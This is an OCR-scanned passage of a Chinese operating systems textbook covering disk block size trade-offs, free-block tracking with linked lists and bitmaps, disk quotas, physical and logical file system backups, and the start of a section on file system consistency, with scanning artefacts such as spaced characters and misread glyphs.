的 文件 ， 没 有 浪费 。 对 于 8KB 块 以 及 4KB 文 件 ， 空 间 利用 率 降 至 50%， 而 16KB 块 则 降 至 25%。 实 际 上 ， 
很 少 有 文件 的 大 小 是 磁盘 块 整数 倍 的 ， 所 以 一 个 文件 的 最 后 一 个 磁盘 块 中 总 是 有 一 些 空间 浪费 。 

然而 ， 这 些 曲线 显示 出 性 能 与 空间 利用 率 天 生 就 是 矛盾 的 。 小 的 块 会 导致 低 的 性 能 但 是 高 的 空间 利 
用 率 。 对 于 这 些 数据 ， 不 存在 合理 的 折 中 方案 。 在 两 条 曲线 的 相交 处 的 大 小 大 约 是 64KB ， 但 是 数据 
(传输 ) 速率 只 有 6.6MB/s 并 且 空间 利用 率 只 有 大 约 7% ， 两 者 都 不 是 很 好 。 从 历史 观点 上 来 说 ， 文 件 系 
统 将 大 小 设 在 1~4KB 之 间 ， 但 现在 随 着 磁盘 超过 了 1TB， 还 是 将 块 的 大 小 提升 到 64KB 并 且 接受 浪费 的 磁 
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盘 空 间 ， 这 样 也 许 更 好 。 磁 盘 空 间 几 乎 不 再 会 短缺 了 。 

在 考察 Windows NT 的 文件 使 用 情况 是 否 与 UNIX 的 文件 使 用 情况 存在 微小 差别 的 实验 中 ，Vogels 在 
康 奈 尔 大 学 对 文件 进行 了 测量 (Vogels，1999) 。 他 观察 到 NT 的 文件 使 用 情况 比 UNIX 的 文件 使 用 情况 复 
杂 得 多 。 他 写 道 : 3 

当 我 们 在 notepad 文 本 编辑 器 中 输入 一 些 字符 后 ， 将 内 容 保 存 到 一 个 文件 中 将 触发 26 个 系统 调用 ， 
包括 3 个 失败 的 open 请 求 、1 个 文件 重 写 和 4 个 打开 和 关闭 序列 。 尽 管 如 此 ， 他 观察 到 了 文件 大 小 的 中 间 
值 (以 使 用 情况 作为 权重 ): 只 读 的 为 IKB ， 只 写 的 为 2.3KB ， 读 写 的 文件 为 4.2KB 。 考 虑 到 数据 集 
测量 技术 以 及 年 份 上 的 差异 ， 这 些 结果 与 VU 的 结果 是 相当 吻合 的 。 

2. 记录 空闲 块 

一 旦 选 定 了 块 大 小 ， 下 一 个 问题 就 是 怎样 跟踪 空闲 块 。 有 两 种 方法 被 广泛 采用 ， 如 图 4-22 所 示 。 第 
一 种 方法 是 采用 磁盘 块 链表 ， 链 表 的 每 个 块 中 包含 尽 可 能 多 的 空闲 磁盘 块 号 。 对 于 1KB 大 小 的 块 和 32 位 
的 磁盘 块 号 ， 空 闲 表 中 每 个 块 包含 有 255 个 空闲 块 的 块 号 (需要 有 一 个 位 置 存放 指向 下 一 个 块 的 指针 ) 。 
考虑 一 个 1TB 的 磁盘 ， 拥 有 10 亿 个 磁盘 块 。 为 了 存储 全 部 地 址 块 号 ， 如 果 每 块 可 以 保存 255 个 块 号 ， 则 
需要 400 万 个 块 。 通 常情 况 下 ， 采 用 空闲 块 存放 空闲 表 ， 这 样 不 会 影响 存储 器 。 


空闲 磁盘 块 : 16,17,18 
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1 KB 的 磁盘 块 可 以 保存 位 图 


256 个 32 位 磁盘 块 号 a) b) 


图 4-22 a) 把 空闲 表 存 放 在 链表 中 ，b) 位 图 


另 一 种 空闲 磁盘 空间 管理 的 方法 是 采用 位 图 。z 个 块 的 磁盘 需要 z 位 位 图 。 在 位 图 中 ， 空 闲 块 用 1 表 
示 ， 已 分 配 块 用 0 表示 (或 者 反之 ) 。 对 于 1TB 磁 盘 的 例子 ， 需 要 10 亿 位 表示 ， 即 需要 大 约 130 000 个 1KB 
块 存储 。 很 明显 ， 位 图 方法 所 需 空间 较 少 ， 因 为 每 块 只 用 一 个 二 进 制 位 标识 ， 而 在 链表 方法 中 ， 每 一 块 
要 用 到 32 位 。 只 有 在 磁盘 快 满 时 〈 即 几乎 没有 空闲 块 时 ) 链表 方案 需要 的 块 才 比 位 图 少 。 

如 果 空 闲 块 倾向 于 成 为 一 个 长 的 连续 分 块 的 话 ， 则 空闲 列表 系统 可 以 改 成 记录 连续 分 块 而 不 是 单个 的 
块 。 一 个 8、16、32 位 的 计数 可 以 与 每 一 个 块 相 关联 ， 来 记录 连续 空闲 块 的 数目 。 在 最 好 的 情况 下 ， 一 个 
基本 上 空 的 磁盘 可 以 用 两 个 数 表达 : 第 一 个 空闲 块 的 地 址 ， 以 及 空闲 块 的 计数 。 另 一 方面 ， 如 果 磁 盘 产 生 
了 很 严重 的 碎片 ， 记 录 连 续 分 块 会 比 记录 单独 的 块 效 率 要 低 ， 因 为 不 仅 要 存储 地 址 ， 而 且 还 要 存储 计数 。 

这 个 情形 说 明了 操作 系统 设计 者 经 常 遇 到 的 一 个 问题 。 有 许多 数据 结构 与 算法 可 以 用 来 解决 一 个 问 
题 ， 但 选择 其 中 最 好 的 则 需要 数据 ， 而 这 些 数据 是 设计 者 无 法 预先 拥有 的 ， 只 有 在 系统 被 部 署 完毕 并 被 
大 量 使 用 后 才 会 获得 。 更 有 甚 者 ， 有 些 数 据 可 能 就 是 无 法 获取 。 例 如 ，1984 年 与 1995 年 我 们 在 VU 测 量 
的 文件 大 小 、 网 站 的 数据 以 及 在 康 奈 尔 大 学 的 数据 ， 是 仅 有 的 4 个 数据 样本 。 尽 管 有 总 比 什么 都 没有 好 ， 
我 们 仍旧 不 清楚 是 否 这 些 数据 也 可 以 代表 家 用 计算 机 、 公 司 计算 机 、 政 府 计算 机 及 其 他 。 经 过 努力 也 许 
可 以 获取 一 些 其 他 种 类 计算 机 的 样本 ， 但 即使 那样 ，( 就 赁 这 些 数 据 来 ) 推断 这 些 测量 结果 适用 于 所 有 
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计算 机 也 是 愚蠢 的 。 

现在 回 到 空闲 表 方 法 ， 只 需要 在 内 存 中 保存 一 个 指针 块 。 当 文件 创建 时 ， 所 需要 的 块 从 指针 块 中 取 
出 。 现 有 的 指针 块 用 完 时 ， 从 磁盘 中 读 入 一 个 新 的 指针 块 。 类 似 地 ， 当 删除 文件 时 ， 其 磁盘 块 被 释放 ， 
并 添加 到 内 存 的 指针 块 中 。 当 这 个 块 填 满 时 ， 就 把 它 写 入 磁盘 。 

在 某 些 特定 情形 下 ， 这 个 方法 产生 了 不 必要 的 磁盘 11/O。 考 虑 图 4-23a 中 的 情形 ， 内 存 中 的 指针 块 只 
有 两 个 表 项 了 。 如 果 释 放 了 一 个 有 三 个 磁盘 块 的 文件 ， 该 指针 块 就 洲 出 了 ， 必 须 将 其 写 入 磁盘 ， 这 就 产 
生 了 图 4-23b 的 情形 。 如 果 现 在 写 入 含有 三 个 块 的 文件 ， 满 的 指针 块 不 得 不 再 次 读 入 ， 这 将 回 到 图 4-23a 的 
情形 。 如 果 有 三 个 块 的 文件 只 是 作为 临时 文件 被 写 人 ， 当 它 被 释放 时 ， 就 需要 另 一 个 磁盘 写 操作 ， 以 便 
把 满 的 指针 块 写 回 磁盘 。 总 之 ， 当 指针 块 几乎 为 空 时 ， 一 系列 短期 的 临时 文件 就 会 引起 大 量 的 磁盘 IO 。 


i i 


图 4-23 a) 在 内 存 中 一 个 被 指向 空闲 磁盘 块 的 指针 几乎 充满 的 块 ， 以 及 磁盘 上 三 个 指针 块 ，b) 释放 一 个 
有 三 个 块 的 文件 的 结果 ，c) 处 理 该 三 个 块 的 文件 的 替代 策略 〈 带 阴影 的 表 项 代表 指向 空闲 磁盘 
块 的 指针 ) 


一 个 可 以 避免 过 多 磁盘 IO 的 替代 策略 是 ， 拆 分 满 了 的 指针 块 。 这 样 ， 当 释放 三 个 块 时 ， 不 再 是 从 
图 4-23a 变 化 到 图 4-23b， 而 是 从 图 4-23a 变 化 到 图 4-23c。 现 在 ， 系 统 可 以 处 理 一 系列 临时 文件 ， 而 不 需 
进行 任何 磁盘 IO。 如 果 内 存 中 指针 块 满 了 ， 就 写 人 磁盘 ， 半 满 的 指针 块 从 磁盘 中 读 入 。 这 里 的 思想 是 : 
保持 磁盘 上 的 大 多 数 指针 块 为 满 的 状态 〈 减 少 磁盘 的 使 用 ) ， 但 是 在 内 存 中 保留 一 个 半 满 的 指针 块 。 这 
样 ， 它 可 以 既 处 理 文件 的 创建 又 同时 处 理 文件 的 删除 操作 ， 而 不 会 为 空闲 表 进 行 磁盘 IO。 

对 于 位 图 ， 在 内 存 中 只 保留 一 个 块 是 有 可 能 的 ， 只 有 在 该 块 满 了 或 空 了 的 情形 下 ， 才 到 磁盘 上 取 另 
一 块 。 这 样 处 理 的 附加 好 处 是 ， 通 过 在 位 图 的 单一 块 上 进行 所 有 的 分 配 操作 ， 磁 盘 块 会 较为 紧密 地 聚集 
在 一 起 ， 从 而 减少 了 磁盘 车 的 移动 。 由 于 位 图 是 一 种 固定 大 小 的 数据 结构 ， 所 以 如 果 内 核 是 (部 分 ) 分 
页 的 ， 就 可 以 把 位 图 放 在 虚拟 内 存 内 ， 在 需要 时 将 位 图 的 页 面 调 入 。 

3. 磁盘 配额 

为 了 防止 人 们 贪心 而 占有 太 多 的 磁盘 空间 ， 多 用 户 操作 系统 常常 提供 一 种 强制 性 磁盘 配额 机 制 。 其 


磁盘 























思想 是 系统 管理 员 分 给 每 个 用 户 拥有 文 。 ”打开 文件 表 配额 表 

件 和 块 的 最 大 数量 ， 操 作 系统 确保 每 个 [em 。 | | 
用 户 不 超过 分 给 他 们 的 配额 。 下 面 将 介 
绍 一 种 典型 的 机 制 。 

当 用 户 打开 一 个 文件 时 ， 系 统 找到 met 
文件 属性 和 磁盘 地 址 ， 并 把 它们 送 入 内 记录 
存 中 的 打开 文件 表 。 其 中 一 个 属性 告诉 
文件 所 有 者 是 谁 。 任 何 有 关 该 文件 大 小 
的 增长 都 记 到 所 有 者 的 配额 上 ， 以 防止 


一 个 用 户 垄 断 所 有 i 节 点 。 

第 二 张 表 包 含 了 每 个 用 户 当前 打开 
文件 的 配额 记录 ， 即 使 是 其 他 人 打开 该 
文件 也 一 样 。 这 张 表 如 图 4-24 所 示 ， 该 





图 4-24 在 配额 表 中 记录 了 每 个 用 户 的 配额 
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表 的 内 容 是 从 被 打开 文件 的 所 有 者 的 磁盘 配额 文件 中 提取 出 来 的 。 当 所 有 文件 关闭 时 ， 该 记录 被 写 回 配 
额 文件 。 

当 在 打开 文件 表 中 建立 一 新 表 项 时 ， 会 产生 一 个 指向 所 有 者 配额 记录 的 指针 ， 以 便 很 容易 找到 不 同 
的 限制 。 每 一 次 往 文件 中 添加 一 块 时 ， 文 件 所 有 者 所 用 数据 块 的 总 数 也 增加 ， 引 发 对 配额 硬 限制 和 软 限 
制 检查 。 可 以 超出 软 限制 ， 但 硬 限制 不 可 以 超出 。 当 已 达到 硬 限制 时 ， 再 往 文件 中 添加 内 容 将 引发 错误 。 
同时 ， 对 文件 数目 也 存在 着 类 似 的 检查 。 

当 用 户 试图 登录 时 ， 系 统 核查 配额 文件 ， 查 看 该 用 户 文件 数目 或 磁盘 块 数目 是 否 超过 软 限 制 。 如 果 
超过 了 任 一 限制 ， 则 显示 一 个 警告 ， 保 存 的 警告 计数 碱 1。 如 果 该 计数 已 为 0， 表 示 用 户 多 次 忽略 该 警告 ， 
因而 将 不 允许 该 用 户 登录 。 要 想 再 得 到 登录 的 许可 ， 就 必须 与 系统 管理 员 协 商 。 

这 一 方法 具有 这 样 的 性 质 ， 即 只 要 用 户 在 退出 系统 前 消除 所 超过 的 部 分 ， 他 们 就 可 以 在 一 次 终端 会 
话 期 间 超过 其 软 限制 ， 但 无 论 什么 情况 下 都 不 能 超过 硬 限制 。 


4.4.2 文件 系统 备份 

比 起 计算 机 的 损坏 ， 文 件 系统 的 破坏 往往 要 糟糕 得 多 。 如 果 由 于 火灾 、 内 电 电 流 或 者 一 杯 咖啡 小 在 
键盘 上 而 弄 坏 了 计算 机 ， 确 实 让 人 伤 透 脑筋 ， 而 且 又 要 花 上 一 笔 钱 ， 但 一 般 而 言 ， 更 换 非常 方便 。 只 要 
去 计算 机 商店 ， 便 宜 的 个 人 计算 机 在 短 短 一 个 小 时 之 内 就 可 以 更 换 (当然 ， 如 果 这 发 生 在 大 学 里 面 ， 则 
发 出 订单 需 3 个 委员 会 的 同意 ， 5 个 签字 要 花 90 天 的 时 间 ) 。 

不 管 是 硬件 或 软件 的 故障 ， 如 果 计 算 机 的 文件 系统 被 破坏 了 ， 恢 复 全 部 信息 会 是 一 件 困难 而 又 费时 
的 工作 ,在 很 多 情况 下 ， 是 不 可 能 的 。 对 于 那些 丢失 了 程序 、 文 档 、 客 户 文件 、 税 收 记 录 、 数 据 库 、 市 场 
计划 或 者 其 他 数据 的 用 户 来 说 ， 这 不 窗 为 一 次 大 的 灾难 。 尽 管 文件 系统 无 法 防止 设备 和 介质 的 物理 损坏 ， 
但 它 至 少 应 能 保护 信息 。 直 接 的 办 法 是 制作 备份 。 但 是 备份 并 不 如 想象 得 那么 简单 。 让 我 们 开始 考察 。 

许多 人 都 认为 不 值得 把 时 间 和 精力 花 在 备份 文件 这 件 事 上 ， 直 到 某 一 天 磁盘 突然 崩溃 ， 他 们 才 意 识 
到 事态 的 严重 性 。 不 过 现在 很 多 公司 都 意识 到 了 数据 的 价值 ， 常 常 把 数据 转 到 磁带 上 存储 ， 并 且 每 天 至 
少 做 一 次 这 样 的 备份 。 现 在 磁带 的 容量 大 至 几 十 甚至 几 百 GB， 而 每 个 GB 仅仅 需要 几 美 分 。 其 实 ， 做 备 
份 并 不 像 人 们 说 得 那么 烦琐 ， 现 在 就 来 看 一 下 相关 的 要 点 。 

做 磁带 备份 主要 是 要 处 理 好 两 个 潜在 问题 中 的 一 个 : 

1) 从 意外 的 灾难 中 恢复 。 

2) 从 错误 的 操作 中 恢复 。 

第 一 个 问题 主要 是 由 磁盘 破裂 、 火 灾 、 洪 水 等 自然 灾害 引起 的 。 事 实 上 这 些 情形 并 不 多 见 ， 所 以 许 
多 人 也 就 不 以 为 然 。 这 些 人 往往 也 是 以 同样 的 原因 忽略 了 自家 的 火灾 保险 。 

第 二 个 原因 主要 是 用 户 意外 地 删除 了 原本 还 需要 的 文件 。 这 种 情况 发 生得 很 频繁 ， 使 得 Windows 的 
设计 者 们 针对 “删除 ”命令 专门 设计 了 特殊 目录 一 一 回收 站 ， 也 就 是 说 ， 在 人 们 删除 文件 的 时 候 ， 文 件 
本 身 并 不 真正 从 磁盘 上 消失 ， 而 是 被 放置 到 这 个 特殊 目录 下 ， 待 以 后 需要 的 时 候 可 以 还 原 回 去 。 文 件 备 
份 更 主要 是 指 这 种 情况 ， 这 就 允许 几 天 之 前 ， 甚 至 几 个 星期 之 前 的 文件 都 能 从 原来 备份 的 磁带 上 还 原 。 

为 文件 做 备份 既 耗 时 间 又 费 空间 ， 所 以 需要 做 得 又 快 又 好 ， 这 一 点 很 重要 。 基 于 上 述 考虑 我 们 来 看 
看 下 面 的 问题 。 首 先 ， 是 要 备份 整个 文件 系统 还 是 仅 备份 一 部 分 呢 ? 在 许多 安装 配置 中 ， 可 执行 程序 
(二 进 制 代 码 ) 放置 在 文件 系统 树 的 某 个 限定 部 分 ， 所 以 如 果 这 些 文件 能 直接 从 厂商 提供 的 网 站 或 安装 
DVD 上 重新 安装 的 话 ， 也 就 没有 必要 为 它们 做 备份 。 此 外 ， 多 数 系统 都 有 专门 的 临时 文件 目录 ， 这 个 目 
录 也 不 需要 备份 。 在 UNIX 系 统 中 ， 所 有 的 特殊 文件 〈 也 就 是 LO 设备 ) 都 放置 在 /dev 目 录 下 ， 对 这 个 目 
录 做 备份 不 仅 没 有 必要 而 且 还 十 分 危险 一 一 因为 一 旦 进行 备份 的 程序 试图 读 取 其 中 的 文件 ， 备 份 程序 就 
会 永久 挂 起 。 简 而 言 之 ， 合 理 的 做 法 是 只 备份 特定 目录 及 其 下 的 全 部 文件 ， 而 不 是 备份 整个 文件 系统 。 

其 次 ， 对 前 一 次 备份 以 来 没有 更 改过 的 文件 再 做 备份 是 一 种 浪费 ， 因 而 产生 了 增 量 转 储 的 思想 。 最 
简单 的 增 量 转 储 形式 就 是 周期 性 地 〈 每 周一 次 或 每 月 一 次 ) 做 全 面 的 转 储 〈 备 份 )， 而 每 天 只 对 从 上 一 
次 全 面 转 储 起 发 生变 化 的 数据 做 备份 。 稍 微 好 一 点 的 做 法 只 备份 自 最 近 一 次 转 储 以 来 更 改过 的 文件 。 当 
然 了 ， 这 种 做 法 极 大 地 缩减 了 转 储 时 间 ， 但 恢复 起 来 却 更 复杂 ， 因 为 最 近 的 全 面 转 储 先 要 全 部 恢复 ， 随 
后 按 逆序 进行 增 量 转 储 。 为 了 方便 恢复 ， 人 们 往往 使 用 更 复杂 的 增 量 转 储 模式 。 

第 三 ， 既 然 待 转 储 的 往往 是 海量 数据 ， 那 么 在 将 其 写 和 磁带 之 前 对 文件 进行 压缩 就 很 有 必要 。 可 是 
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对 许多 压缩 算法 而 言 ， 备 份 磁带 上 的 单个 坏 点 就 能 破坏 解压 缩 算法 ， 并 导致 整个 文件 甚至 整个 磁带 无 法 
读 取 。 所 以 是 否 要 对 备份 文件 流 进行 压缩 必须 慎重 考虑 。 

第 四 ， 对 活动 文件 系统 做 备份 是 很 难 的 。 因 为 在 转 储 过 程 中 添加 、 删 除 或 修改 文件 和 目录 可 能 会 导 
致 文件 系统 的 不 一 致 性 。 不 过 ， 既 然 转 储 一 次 需要 几 个 小 时 ， 那 么 在 晚上 大 部 分 时 间 让 文件 系统 脱 机 是 
很 有 必要 的 ， 虽 然 这 种 做 法 有 时 会 令 人 难以 接受 。 正 因 如 此 ， 人 们 修改 了 转 储 算法 ， 记 下 文件 系统 的 瞬 
时 快照 ， 即 复制 关键 的 数据 结构 ， 然 后 需要 把 将 来 对 文件 和 目录 所 做 的 修改 复制 到 块 中 ， 而 不 是 处 处 更 
新 它们 (Hutchinson 等 人 ，1999)。 这 样 ， 文 件 系 统 在 抓 取 快照 的 时 候 就 被 有 效 地 冻结 了 ， 留 待 以 后 空 
闲 时 再 备份 。 : 

第 五 ， 即 最 后 一 个 问题 ， 做 备份 会 给 一 个 单位 引入 许多 非 技术 性 问题 。 如 果 当 系统 管理 员 下 楼 去 取 
咖啡 ， 而 毫 无 防备 地 把 备份 磁盘 或 磁带 搁置 在 办 公 室 里 的 时 候 ， 就 是 世界 上 最 棒 的 在 线 保安 系统 也 会 失 
去 作用 。 这 时 ， 一 个 间谍 所 要 做 的 只 是 潜入 办 公 室 、 将 一 个 小 磁盘 或 磁带 放 入 口袋 ， 然 后 绅士 般 地 离开 。 
再 见 吧 保安 系统 。 即 使 每 天 都 做 备份 ， 如 果 磁 上 一 场 大 火烧 光 了 计算 机 和 所 有 的 备份 磁盘 ， 那 做 备份 又 
有 什么 意义 呢 ? 由 于 这 个 原因 ， 所 以 备份 磁盘 应 该 远离 现场 存放 ， 不 过 这 又 带 来 了 更 多 的 安全 风险 (A 
为 ， 现 在 必须 保护 两 个 地 点 了 ) 。 关 于 此 问题 和 管理 中 的 其 他 实际 问题 ， 请 参考 Nemeth 等 人 (2013), 
接 下 来 我 们 只 讨论 文件 系统 备份 所 涉及 的 技术 问题 。 

磁盘 转 储 到 磁带 上 有 两 种 方案 : 物理 转 储 和 逻辑 转 储 。 物 理 转 储 是 从 磁盘 的 第 0 块 开始 ， 将 全 部 的 
磁盘 块 按 序 输出 到 磁带 上 ， 直 到 最 后 一 块 复制 完毕 。 此 程序 很 简单 ， 可 以 确保 万 无 一 失 ， 这 是 其 他 任何 
实用 程序 所 不 能 比 的 。 

不 过 有 几 点 关于 物理 转 储 的 评价 还 是 值得 一 提 的 。 首 先 ， 未 使 用 的 磁盘 块 无 须 备 份 。 如 果 转 储 程序 
能 够 访问 空 闪 块 的 数据 结构 ， 就 可 以 避免 该 程序 备份 未 使 用 的 磁盘 块 。 但 是 ， 既 然 磁带 上 的 第 k 块 并 不 
代表 磁盘 上 的 第 k 块 ， 那 么 要 想 略 过 未 使 用 的 磁盘 块 就 需要 在 每 个 磁盘 块 前 边 写 下 该 磁盘 块 的 号 码 (或 
其 他 等 效 数据 )。 

第 二 个 需要 关注 的 是 坏 块 的 转 储 。 制 造 大 型 磁盘 而 没有 任何 瑕 症 几 乎 是 不 可 能 的 ， 总 是 有 一 些 坏 块 
存在 。 有 时 进行 低级 格式 化 后 ， 坏 块 会 被 检测 出 来 ， 标 记 为 坏 的 ， 并 被 应 对 这 种 紧急 状况 的 在 每 个 轨道 
末端 的 一 些 空闲 块 所 替换 。 在 很 多 情况 下 ， 磁 盘 控 制 器 处 理 坏 块 的 替换 过 程 是 透明 的 ， 甚 至 操作 系统 也 
不 知道 。 

然而 ， 有 时 格式 化 后 块 也 会 变 坏 ， 在 这 种 情况 下 操作 系统 可 以 检测 到 它们 。 通 常 ， 可 以 通过 建立 一 
个 包含 所 有 坏 块 的 “文件 ”来 解决 这 个 问题 一 一 只 要 确保 它们 不 会 出 现在 空闲 块 池 中 并 且 绝 不 会 被 分 配 。 
不 用 说 ， 这 个 文件 是 完全 不 能 够 读 取 的 。 

如 果 磁 盘 控 制 器 将 所 有 坏 块 重 新 映射 ,并 对 操作 系统 隐藏 的 话 , 物理 转 储 工作 还 是 能 够 顺利 进行 的 。 
另 一 方面 ， 如 果 这 些 坏 块 对 操作 系统 可 见 并 映射 到 一 个 或 几 个 坏 块 文件 或 者 位 图 中 , 那么 在 转 储 过 程 中 ， 
物理 转 储 程序 绝对 有 必要 能 访问 这 些 信息 ， 并 避免 转 储 之 ， 从 而 防止 在 对 坏 块 文件 备份 时 的 无 止境 磁盘 
读 错误 发 生 。 

Windows 系 统 有 分 页 文件 和 休 卢 文件 。 它 们 在 文件 还 原 时 不 发 挥 作用 ， 同 时 也 不 应 在 第 一 时 间 进 行 
备份 。 特 定 的 系统 可 能 也 有 其 他 不 需要 备份 的 文件 ， 在 销毁 程序 中 需要 注意 它们 。 

物理 转 储 的 主要 优点 是 简单 、 极 为 快速 (基本 上 是 以 磁盘 的 速度 运行 )。 主 要 缺点 是 ， 既 不 能 跳 过 选 
定 的 目录 ， 也 无 法 增 量 转 储 ， 还 不 能 满足 恢复 个 人 文件 的 请 求 。 正 因 如 此 ， 绝 大 多 数 配置 都 使 用 逻辑 转 储 。 

逻辑 转 储 从 一 个 或 几 个 指定 的 目录 开始 ， 递 归 地 转 储 其 自给 定 基准 日 期 〈 例 如， 最 近 一 次 增 量 转 储 
或 全 面 系统 转 储 的 日 期 ) 后 有 所 更 改 的 全 部 文件 和 目录 。 所 以 ， 在 逻辑 转 储 中 ， 转 储 磁 带 上 会 有 一 连 串 
精心 标识 的 目录 和 文件 ， 这 样 就 很 容易 满足 恢复 特定 文件 或 目录 的 请 求 。 

既然 逻辑 转 储 是 最 为 普遍 的 形式 ， 就 让 我 们 以 图 4-25 为 例 来 仔细 研究 一 个 通用 算法 。 该 算法 在 
UNIX 系 统 上 广 为 使 用 。 在 图 中 可 以 看 到 一 棵 由 目录 ( 方 框 ) 和 文件 (圆圈) 组 成 的 文件 树 。 被 阴影 覆 
盖 的 项 目 代表 自 基准 日 期 以 来 修改 过 ， 因 此 需要 转 储 ， 无 阴影 的 则 不 需要 转 储 。 

该 算法 还 转 储 通 向 修改 过 的 文件 或 目录 的 路 径 上 的 所 有 目录 (甚至 包括 未 修改 的 目录 ) ， 原 因 有 二 。 
其 一 是 为 了 将 这 些 转 储 的 文件 和 目录 恢复 到 另 一 台 计 算 机 的 新 文件 系统 中 。 这 样 ， 转 储 程序 和 恢复 程序 
就 可 以 在 计算 机 之 间 进 行文 件 系统 的 整体 转移 。 
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图 4-25 待 转 储 的 文件 系统 ， 其 中 方 框 代表 目录 ， 圆 圈 代 表 文件 。 被 阴影 覆盖 的 项 目 表示 自 上 次 转 储 以 
来 修改 过 。 每 个 目录 和 文件 都 被 标 上 其 i 节 点 号 


转 储 被 修改 文件 之 上 的 未 修改 目录 的 第 二 个 原因 是 为 了 可 以 对 单个 文件 进行 增 量 恢复 (很 可 能 是 对 
思春 操作 而 损坏 的 文件 的 恢复 ) 。 设 想 如 果 星 期 天 晚上 转 储 了 整个 文件 系统 ， 星 期 一 晚上 又 做 了 一 次 增 
量 转 储 。 在 星期 二 ，/usr/jhs/proj/nr3 目 录 及 其 下 的 全 部 目录 和 文件 被 删除 了 。 星 期 三 一 大 早 用 户 又 想 恢 
复 /usrjhs/proj/nr3/plans/summary 文 件 。 但 因为 没有 设置 ， 所 以 不 可 能 单独 恢复 summary 文 件 。 必 须 首 先 
恢复 nr3 和 plans 这 两 个 目录 。 为 了 正确 获取 文件 的 所 有 者 、 模 式 、 时 间 等 各 种 信息 ， 这 些 目录 当然 必须 
再 次 备份 到 转 储 磁带 上 ， 尽 管 自 上 次 完整 转 储 以 来 它们 并 没有 修改 过 。 

逻辑 转 储 算法 要 维持 一 个 以 i 节点 号 为 索引 的 位 图 ， 每 个 i 节点 包含 了 几 位 。 随 着 算法 的 执行 ， 位 图 
中 的 这 些 位 会 被 设置 或 清除 。 算 法 的 执行 分 为 四 个 阶段 。 第 一 阶段 从 起 始 目 录 (本 例 中 为 根 目录 ) 开始 
检查 其 中 的 所 有 目录 项 。 对 每 一 个 修改 过 的 文件 ， 该 算法 将 在 位 图 中 标记 其 i 节点 。 算 法 还 标记 并 递归 
检查 每 一 个 目录 (不 管 是 否 修改 过 )。 

第 一 阶段 结束 时 ， 所 有 修改 过 的 文件 和 全 部 目录 都 在 位 图 中 标记 了 ， 如 图 4-26a 所 示 (以 阴影 标记 )。 
理论 上 说 来 ， 第 二 阶段 再 次 递归 地 遍历 目录 树 ， 并 去 掉 目 录 树 中 任何 不 包含 被 修改 过 的 文件 或 目录 的 目 
录 上 的 标记 。 本 阶段 的 执行 结果 如 图 4-26b 所 示 。 注 意 ，i 节 点 号 为 10、11、14、27、29 和 30 的 目录 此 时 
已 经 被 去 掉 标记 ， 因 为 它们 所 包含 的 内 容 没 有 做 任何 修改 。 它 们 也 不 会 被 转 储 。 相 反 ，i 节 点 号 为 5 和 6 
的 目录 其 本 身 尽管 没有 被 修改 过 也 要 被 转 储 ， 因 为 在 新 的 机 器 上 恢复 当日 的 修改 时 需要 这 些 信息 。 为 了 
提高 算法 效率 ， 可 以 将 这 两 阶段 的 目录 树 遍历 合 二 为 一 。 





图 4-26 逻辑 转 储 算法 所 使 用 的 位 图 


现在 哪些 目录 和 文件 必须 被 转 储 已 经 很 明确 了 ， 就 是 图 4-26b 中 所 标记 的 部 分 。 第 三 阶段 算法 将 以 
节点 号 为 序 ， 扫 描 这 些 i 节 点 并 转 储 所 有 标记 为 需 转 储 的 目录 ， 如 图 4-26c 所 示 。 为 了 进行 恢复 ， 每 个 被 
转 储 的 目录 都 用 目录 的 属性 (所 有 者 、 时 间 等 ) 作为 前 级 。 最 后 ， 在 第 四 阶段 ， 在 图 4-26d 中 被 标记 的 
文件 也 被 转 储 ， 同 样 ， 由 其 文件 属性 作为 前 级 。 至 此 ， 转 储 结束 。 
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从 转 储 磁带 上 恢复 文件 系统 很 容易 办 到 。 首 先 要 在 磁盘 上 创建 一 个 空 的 文件 系统 ， 然 后 恢复 最 近 一 
次 的 完整 转 储 。 由 于 磁带 上 最 先 出 现 目录 ， 所 以 首先 恢复 目录 ， 给 出 文件 系统 的 框架 ， 然 后 恢复 文件 本 
身 。 在 完整 转 储 之 后 的 是 完整 转 储 的 第 一 次 增 量 转 储 ， 然 后 是 第 二 次 ， 重 复 这 一 过 程 ， 以 此 类 推 。 

尽管 罗 辑 转 储 十 分 简单 ， 还 是 有 几 点 坏 手 之 处 。 首 先 ， 既 然 空闲 块 列表 并 不 是 一 个 文件 ， 那 么 在 所 
有 被 转 储 的 文件 恢复 完毕 之 后 ， 就 需要 从 零 开 始 重新 构造 。 这 一 点 可 以 办 到 ， 因 为 全 部 空闲 块 的 集合 恰 
好 是 包含 在 全 部 文件 中 的 块 集合 的 补 集 。 

另 一 个 问题 是 关于 链接 。 如 果 一 个 文件 被 链接 到 两 个 或 多 个 目录 中 ， 要 注意 在 恢复 时 只 对 该 文件 恢 
复 一 次 ， 然 后 所 有 指向 该 文件 的 目录 重新 指向 该 文件 。 

还 有 一 个 问题 就 是 : UNIX 文 件 实际 上 包含 了 许多 “空洞 "。 打 开 文 件 ， 写 几 个 字 节 ， 然 后 找到 文件 
中 一 个 偏 移 了 一 定 距 离 的 地 址 ， 又 写 人 更 多 的 字 节 ， 这 么 做 是 合法 的 。 但 两 者 之 间 的 这 些 块 并 不 属于 文 
件 本 身 ， 从 而 也 不 应 该 在 其 上 实施 转 储 和 恢复 操作 。 核 心 文件 通常 在 数据 段 和 堆栈 段 之 间 有 一 个 数 百 兆 
字 节 的 空洞 。 如 果 处 理 不 得 当 ， 每 个 被 恢复 的 核心 文件 会 以 “0” 填 充 这 些 区 域 ， 这 可 能 导致 该 文件 与 
虚拟 地 址 空间 一 样 大 (例如 ，2” 字 节 ， 更 糟糕 的 可 能 会 达到 2” 字 节 )。 

最 后 ， 无 论 属于 哪 一 个 目录 (它们 并 不 一 定局 限于 /dev 目 录 下 )， 特 殊 文件 、 命 名 管道 以 及 类 似 的 文 
件 都 不 应 该 转 储 。 关 于 文件 系统 备份 的 更 多 信息 ， 请 参考 (Chervenak 等 人 ，1998; Zwicky，1991)。 


4.4.3 文件 系统 的 一 致 性 

影响 文件 系统 可 靠 性 的 另 一 个 问题 是 文件 系统 的 一 致 性 。 很 多 文件 系统 读 取 磁盘 块 ， 进 行 修改 后 ， 
再 写 回 磁盘 。 如 果 在 修改 过 的 磁盘 块 全 部 写 回 之 前 系统 崩溃 ， 则 文件 系统 有 可 能 处 于 不 一 致 状态 。 如 果 
一 些 未 被 写 回 的 块 是 i 节 点 块 、 目 录 块 或 者 是 包含 有 空闲 表 的 块 时 ， 这 个 问题 尤为 严重 。 

